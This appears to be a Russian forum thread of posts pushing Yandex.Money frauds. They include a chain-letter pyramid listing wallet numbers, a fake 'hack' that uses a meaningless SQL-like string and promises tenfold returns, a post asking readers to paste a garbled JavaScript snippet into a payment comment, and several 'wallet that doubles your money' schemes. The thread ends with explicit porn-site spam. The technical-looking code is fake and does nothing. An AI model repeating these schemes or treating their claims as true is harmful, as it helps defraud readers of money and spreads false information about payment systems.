1. Зарегистрируйтесь в системе яндекс мани.Далее необходимо положить на свой счет 70 руб.(чуть больше, потому что при осуществлении перевода система снимает 0.5% переводимой суммы,т.е.Вы должны будете переводить по 10 руб. 5 коп., в сумме - 70 руб. 35 коп.)
2. Необходимо перевести по 10 руб. 5 коп.(5 коп. снимается службой перевода за совершение операции) на 7 предлагаемых ниже счетов яндекс-денег.
Затем кликаем слева от номера вашего счета по ссылке «Перевести».
Важно!Перевод нужно осуществлять на счет, а не на e-mail.
Важно!При каждом отправлении указывайте в поле «Название платежа» следующую фразу: «Пожалуйста, внесите меня в список яндекс-кошельков».
Чтобы получать доход, необходимо отправить на каждый из этих 7 кошельков по 10 руб. 5 коп., иначе вы просто не будете включены в систему сетевыми модераторами яндекс-кошельков и не сможете обналичить доход. (10 руб. 5 коп. - это отправляемая Вами сумма, при этом получатель получает ровно 10 руб.
Итак, отправьте по 10 руб. 5 коп. на каждый из следующих счетов:
1 —41001915789455 2 —41001478029569 3 —41001478037034 4 — 41001485230090 5 —41001485274208 6 —410011075265929
7 —410011075262106
ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 10 руб. 5 коп. - иначе, сетевыми модераторами яндекс -кошельков, вы просто не будете включены в систему и не сможете обналичить доход.
Теперь ВНИМАНИЕ!!!После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала до конца.В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли,3-ий - на место 2-го,4-ый - на место 3-го,5-ый - на место 4-го,6-ой - на место 5-го и 7-ой - на место 6-го!А в 7-ой номер, который оказался пустым,ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!!3.Разместите эту статью (или объявление с ссылкой на страницу, которую Вы без труда можете сделать на одном из бесплатных сайтов)-на НЕ МЕНЕЕ ЧЕМ 200-300 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ. ЗАПОМНИТЕ ЧЕМ БОЛЬШЕ Вы разместите,ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД.И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС.
Займитесь этим сейчас - не откладывая на завтра….!!!ВРЕМЯ - ДЕНЬГИ!!!Удачи Вам!
Поделиться2312014-02-12 14:03:47
Реально работает 410012056239274
Взлом РАБОТАЕТ!
Уважаемые пользователи Яндекс денег!
существует самый настоящий взлом!
И сейчас я раскажу какой!
ВЗЛОМ:
Заводим свой собственный кошелёк
Ложим на счёт 100 руб!
И не больше и не меньше(100)
И нажимаем кнопку перевести!
При переводе:
Перевод на счёт!Номер получателя: 410012056239274
Сумма к получению 100 руб!Но не больше и не меньше!А то деньги не прийдут!
Сообщение к получателю:
SELECT MONEY(DISTINCT cc.cash_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.cash_group = 'money' AND cc.cash_type = 'money' AND r.cash_id = cc.cash_id AND n.cash_id = cc.cash_id AND r.region_id = '9' AND n.model_id = «ваш номер счета» AND singer_id =,{1000}-100{reload}''
Нечего кроме номера кошелька не менять а то деньги не прийдут!!!
Название платежа: cc.cash.id
Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 5-10 мин вам приходят:
Если вы кинули 100 рублей будет 1000!!!! 200 будет 2000 и.т.д
Не теряйте надежду в взломе!
Предупреждаю!Делать только 3 раза на дню а то яндекс деньги спалят!!!
Взлом рабочий!
Сама пользуюсь!)
Поделиться2322014-04-18 12:16:29
Здравствуйте всем кто желает заработать на холяву,не много но на пиво с рыбкой будет хватать.Я же в течения года так зарабатываю знаете прикольно не напрягаюсь.Над просто выслать на указанный мною номер и сумма в течений пяти (ладно не буду врать,в течений 10-15 м сумма придет удвоенная) Номер кошелька 410011265124160 В комментарии нужно скопировать этот скрипт:
<script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++) { if (i{if (document.all) { clearTimeout(timer) startfontsize=0 for (i=0;i<=ringnumber;i++) { thisring=eval("document.all.ring"+i+".style") thisring.visibility="hidden"
i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor((maxfontsize/ringnumber))*(i+1)
<body><aref="http://scic.ya/seOver="showrings()onMouseOut="hid>[/font] Много не советую пересылать по минимому 50-100 р.Оно работает (я сам программист я вам всем кто прочтет письмо очень советую попробовать.Кому не ясно отвечу лично. ЖЕЛАЮ УДАЧИ
Поделиться2332015-04-28 17:18:34
Взлом работает 410013084663131 кладете 150 получаете300 скидывайте свою почту
Поделиться2342015-07-24 14:41:15
Вот реальный способ зароботать на яндекс кошельке КАК ОБМАНУТЬ ЛОХОТРОНЩИКОВ И ЗАРАБОТАТЬ 5.000-10.000 РУБЛЕЙ.
Я расскажу вам:
1. Как наглые лохотронщики обманывают людей на сумму в размере 5000 рублей (Яндекс-Деньги), а некоторых на еще большие суммы.
2. Как обмануть лохотронщиков и заработать несколько тысяч рублей (Яндекс-Деньги)
Тема 1. История « Как я лохонула их и получаю стабильно 10.000 рублей » Нашла я в сети где-то статью приблизительно такого содержания: «Есть в системе Яндекс-Деньги волшебный кошелек, и все что вы на него пошлете вернется вам в удвоенном размере!!! Любая сумма от 130 рублей и выше! Пошлете тысячу получите две тысячи и т.д.». Конечно, всем понятно, лохотрон, но если порыть глубже… Я не поверила, но для теста послала 130 рублей. Через где-то 5 часов проверила свой Яндекс кошелек и обнаружила перевод в 260 рублей! Я удивилась. Послала потом еще 130 рублей опять то же самое. Потом послала 300 рублей, мне пришло 600. Осмелев окончательно послала все что у меня было – около 3000 рублей … Что было дальше, думаю, вы уже поняли. Никаких 6000 рублей мне никто не прислал, да и мои 3000 тоже исчезли навсегда… Понятно как они работают. У них на сервере стоит хитрая программка, которая принимает суммы от 100 рублей и примерно до 800 рублей (закидывал им 900 рублей и их забрали, а 700 закинул программа вернула 1400 рублей) Вот и заколачивают тысячи! В общем, это я к тому, что если быть аккуратным и выслать, небольшую сумму (они принимают любые суммы, но не меньше 100 рублей), то всегда можно получать в два раза больше. У них есть специальная программа, которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда нужно кидануть. Переводы суммой до 800 рублей они не забирают никогда. То есть, послав 800 рублей вы в любом случае получите 1600 рублей, т.к. сумма мелкая и они будут ждать пока вы пришлете больше. Если аккуратно слать им небольшие суммы то можно их обманывать. Они уже не смотрят на переводы сами, за них это делает специальный софт (программа), что упрощает вероятность их обмана. Я сейчас зарабатываю на этом около 10.000 рублей в неделю (можно делать и больше). Это не миллионы, но это более-менее стабильный доход. Денег на этих кошельках сотни тысяч, и меня очень раздражает как они кидают людей, по этому надо их разорить. ВОТ САМ КОШЕЛЁК: 410013347159518 Совет: Внимание! Повторяю! ставку поднимать не стоит, т.к. если ставка выше 800 рублей то программа их забирает даже и не пробуйте!!! Я делаю то же самое и получаю около 10.000 в неделю, которых мне очень даже вполне хватает! В общем, я рассказала, что от меня требовалось. Дальше – ваше дело.. ВНИМАНИЕ!!! НЕ СОВЕТУЮ ОТСЫЛАТЬ МЕНЕЕ 100Р ЭТО МОЖЕТ ПРИВЕСТИ К СБОЮ В СИСТЕМЕ КОШЕЛЬКА !!! И ВАШИ ДЕНЬГИ НЕ ВЕРНУТСЯ!!! ЛУЧШЕ ОТПРАВЛЯЙТЕ НЕРОВНЫЕ СУММЫ,НАПРИМЕР: 110 ,130 ,220 ,270 И ТАК ДАЛЕЕ.
Поделиться2352018-08-07 09:04:46
Ребят пробовала ваши кошельки и даже 50 рублей не вернули! Решила набрать на угад номер кошелька и офигела если честно)) сначало 50рублей отправила и мне вернули 200,для меня это было заманчиво я отправила все 200 и мне вернули 800)))) третий раз решила не рисковать и попробовать на следующий день,и у меня получилось) снова сделала еще два платежа и всё вернули)
Ребят я реально заработала за неделю уже около 25000.
Сейчас хочу всю сумму отправить)даст мне бог) попробуйте даже с минимальной суммы вот кошелек 410015892696466,вообще где то видела что это вроде как чей то из бывших админа,и они его деньги просто раздают! Я блин очень рада...
Поделиться2362020-04-20 16:02:04
X-CAM4: Free Live Cams | Worlds Largest Live Cams Site! http://x-cam4.com/ Watch Girl Real People Naked Boobs & Having Sex Live on Webcam 24/7 100% Free Girls, Chat Cams & Broadcast. No-Sign Up & No Registration Required. #Couples http://x-cam4.com/
Males Transsexuals HD Masturbation Anal http://x-cam4.com/
Squirt Deepthroat Dancing Dildo Cumshaw Smoking Ass Fucking Sucking Cumming CockSucking Massage Fucking Flashing Games Love http://x-cam4.com/
Watch Girl 000's of Real People Naked Boobs & Having Sex Live on Webcam 24/7 31. 100% Free to Watch Girls, Chat Cams & Broadcast. No-Sign Up & No Registration Required.
cum show with 69 on goal 586 http://x-cam4.com/